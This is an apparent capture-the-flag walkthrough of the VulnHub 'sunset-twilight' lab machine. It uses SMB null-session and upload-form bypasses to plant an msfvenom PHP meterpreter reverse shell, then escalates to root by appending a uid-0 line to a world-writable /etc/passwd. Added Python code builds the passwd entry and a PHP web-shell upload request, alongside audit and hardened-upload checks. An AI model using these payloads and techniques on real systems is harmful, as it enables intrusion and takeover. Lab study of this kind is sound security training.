Morning~~~
Target: https://www.vulnhub.com/entry/sunset-twilight,512/
The focus here is on the tools and the line of thinking, not a polished report.
Find the box on the lab subnet:
nmap 192.168.43.0/24
Target IP: 192.168.43.164
Full port scan with service and OS detection:
nmap -A -p1-65535 192.168.43.164
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp open http-proxy PHP cli server 5.5 or later
63525/tcp open http PHP cli server 5.5 or later
enum4linux 192.168.43.164
Share found: WRKSHARE  Disk  Workplace Share. Do not access if not an employee.
The share accepts a null session (no password; -N skips the password prompt):
smbclient -N //192.168.43.164/WRKSHARE
smb: \>
cd \var\www\html
smb: \var\www\html\>
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
The share is rooted at the target's filesystem root and the web root is writable through it, so upload muma.php straight into /var/www/html:
smb: \var\www\html\> put muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
Browse to http://192.168.43.164/muma.php; the handler receives the reverse shell.
Drop from meterpreter to a system shell and upgrade it to a pty:
shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/var/www/html$
cd /home
The listing shows one user, miguel.
cat /etc/passwd
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
ls -al /etc/passwd shows the file is world-readable and world-writable, which is the misconfiguration this escalation rests on:
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd
On the attacker machine, generate an MD5-crypt hash for the password 123456 with salt useruser:
openssl passwd -1 -salt useruser 123456
Copy the target's /etc/passwd to the attacker machine and append a uid-0 entry as the last line. The entry needs all seven fields (name:hash:uid:gid:gecos:home:shell); a hash in the second field makes su skip /etc/shadow for that user, and uid 0 makes the account root regardless of its name:
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:root:/root:/bin/bash
Serve the edited file from the attacker machine and pull it onto the target (since the file is world-writable, echo '...' >> /etc/passwd on the target would do just as well):
python3 -m http.server 80
wget http://192.168.43.154/passwd -O /etc/passwd
su useruser
id
uid=0(root) gid=0(root) groups=0(root)
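The passwd edit above, as an added example that is not part of the write-up: it builds the seven-field entry programmatically (the hash is the one openssl printed on the page, copied rather than recomputed), flags entries with the wrong field count, and lists uid-0 accounts other than root, which is the first thing a defender checks after this kind of escalation. The passwd excerpt is constructed from the two entries the page shows plus the attacker's line.

```python
"""Build a /etc/passwd entry for the world-writable-passwd escalation and
audit a passwd file for the traces it leaves (added example, not the write-up's code)."""
import stat

# Hash printed on the page by `openssl passwd -1 -salt useruser 123456`
# (copied from the write-up, not recomputed here).
PAGE_HASH = "$1$useruser$8MVi1CAiLopcN8yk6Hj4B0"


def passwd_entry(user, pw_hash, uid=0, gid=0, gecos="", home="/root", shell="/bin/bash"):
    """Return one passwd line: name:hash:uid:gid:gecos:home:shell.

    A hash in field 2 makes su authenticate against it instead of /etc/shadow;
    uid 0 makes the account root whatever its name is."""
    fields = [user, pw_hash, str(uid), str(gid), gecos, home, shell]
    for f in fields:
        if ":" in f or "\n" in f:
            raise ValueError(f"passwd field may not contain ':' or newline: {f!r}")
    return ":".join(fields)


def parse_passwd(text):
    """Return [(lineno, fields)] for every non-empty line."""
    return [(n, line.split(":")) for n, line in enumerate(text.splitlines(), 1) if line.strip()]


def malformed_entries(text):
    """Line numbers whose field count is not 7.

    glibc does not reject a short line: the missing trailing fields simply come out
    empty (an empty shell falls back to /bin/sh), so a six-field line still logs in
    but with its home directory sitting in the GECOS slot. Count before writing."""
    return [n for n, f in parse_passwd(text) if len(f) != 7]


def rogue_uid0_accounts(text):
    """Names of uid-0 accounts other than root: the artefact this technique leaves."""
    return [f[0] for _, f in parse_passwd(text) if len(f) == 7 and f[2] == "0" and f[0] != "root"]


def passwd_is_world_writable(mode):
    """True for the 0777 mode the page's `ls -l` shows (-rwxrwxrwx)."""
    return bool(mode & stat.S_IWOTH)


# Constructed excerpt: the two real entries from the page, the attacker's line in
# correct seven-field form, and a six-field variant (gecos and home run together)
# to show what the audit flags.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "miguel:x:1000:1000:,,,:/home/miguel:/bin/bash",
    passwd_entry("useruser", PAGE_HASH),
    "useruser2:" + PAGE_HASH + ":0:0:/root/root:/bin/bash",  # only 6 fields
])

if __name__ == "__main__":
    print(passwd_entry("useruser", PAGE_HASH))
    print("malformed lines:", malformed_entries(SAMPLE_PASSWD))
    print("uid-0 accounts besides root:", rogue_uid0_accounts(SAMPLE_PASSWD))
```

Run on a real box with `rogue_uid0_accounts(open("/etc/passwd").read())` and `passwd_is_world_writable(os.stat("/etc/passwd").st_mode)`; either returning something is a finding on its own.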
Method 2: getting a shell through the upload form (the target sits at 192.168.43.3 in this run)
dirb http://192.168.43.3/
http://192.168.43.3/gallery/
http://192.168.43.3/gallery/original/ has directory listing enabled, so every uploaded file (for example muma.php) is visible and directly reachable there.
Rename muma.php to muma.php.pjpeg so the form accepts it.
Upload it and intercept the request in Burp Suite; the file part carries
Content-Type: image/jpeg
Change the filename back to muma.php (leave the Content-Type as image/jpeg) and forward the request.
Upload succeeds; the file now lives at
http://192.168.43.3/gallery/original/muma.php
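The Burp edit above rebuilt by hand, as an added example that is neither the write-up's code nor the gallery's: it constructs the multipart body with filename="muma.php" and Content-Type: image/jpeg around PHP bytes, parses it back the way a server would, and puts a Content-Type-only check (my assumption about what the gallery trusts, since the bypass needs nothing else) beside a hardened one that decides by magic bytes and stores under a random name. The PHP stub, form field name and boundary are constructed stand-ins.

```python
"""Rebuild the edited upload request and model the server-side check it defeats
(added example; not the write-up's code and not the gallery's real implementation)."""
import secrets

# Constructed stand-in for the uploaded file; the page used an msfvenom meterpreter stager.
PHP_PAYLOAD = b"<?php system($_GET['cmd']); ?>"
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_TYPES = {"image/jpeg", "image/pjpeg", "image/png"}


def build_multipart(field, filename, content_type, data, boundary="----twilightboundary"):
    """Return (headers, body) for a single-file multipart/form-data POST.

    The two strings the page edits in Burp are `filename` and `content_type`: the browser
    sent filename="muma.php.pjpeg", the edit makes it filename="muma.php" with
    Content-Type: image/jpeg, and the bytes stay PHP throughout."""
    part_headers = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    body = part_headers + data + f"\r\n--{boundary}--\r\n".encode()
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    }
    return headers, body


def parse_multipart(headers, body):
    """Minimal server-side view of the body: the first file part as a dict, or None."""
    boundary = headers["Content-Type"].split("boundary=", 1)[1].encode()
    for chunk in body.split(b"--" + boundary):
        if b"\r\n\r\n" not in chunk:
            continue  # preamble before the first delimiter, or the closing "--\r\n"
        raw_headers, data = chunk.split(b"\r\n\r\n", 1)
        hdrs = {}
        for line in raw_headers.decode().split("\r\n"):
            if ":" in line:
                k, v = line.split(":", 1)
                hdrs[k.strip().lower()] = v.strip()
        disp = hdrs.get("content-disposition", "")
        filename = disp.split('filename="', 1)[1].split('"', 1)[0] if 'filename="' in disp else None
        if data.endswith(b"\r\n"):  # the CRLF before the next delimiter belongs to the delimiter
            data = data[:-2]
        return {"filename": filename, "content_type": hdrs.get("content-type"), "data": data}
    return None


def accept_upload_weak(filename, content_type, data):
    """Assumed model of the gallery's gate: only the client-supplied Content-Type is
    checked, so PHP bytes labelled image/jpeg pass and the client-chosen name is kept."""
    return content_type in ALLOWED_TYPES


def accept_upload_hardened(filename, content_type, data):
    """Decide by content, not by what the client claims; return the stored name or None.

    The client's filename is ignored on purpose: Apache's AddHandler matches `.php`
    anywhere in a name, so even muma.php.pjpeg can execute. A valid JPEG with PHP
    hidden in a comment still passes the sniff, which is why the random name with an
    image extension (and no PHP handler on the upload directory) carries the weight."""
    if data.startswith(JPEG_MAGIC):
        ext = ".jpg"
    elif data.startswith(PNG_MAGIC):
        ext = ".png"
    else:
        return None
    if content_type not in ALLOWED_TYPES:
        return None
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    hdrs, body = build_multipart("file", "muma.php", "image/jpeg", PHP_PAYLOAD)
    part = parse_multipart(hdrs, body)
    print(part["filename"], part["content_type"], len(part["data"]), "bytes")
    print("weak check accepts:", accept_upload_weak(part["filename"], part["content_type"], part["data"]))
    print("hardened stores as:", accept_upload_hardened(part["filename"], part["content_type"], part["data"]))
```

To send the constructed request for real, pass `hdrs` and `body` to `http.client.HTTPConnection(host).request("POST", path, body, hdrs)`; the point of building it by hand is that the two edited strings are exactly the ones Burp let you change.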
Payload and handler are the same as in method 1:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
Browse to http://192.168.43.3/gallery/original/muma.php and the handler receives the shell.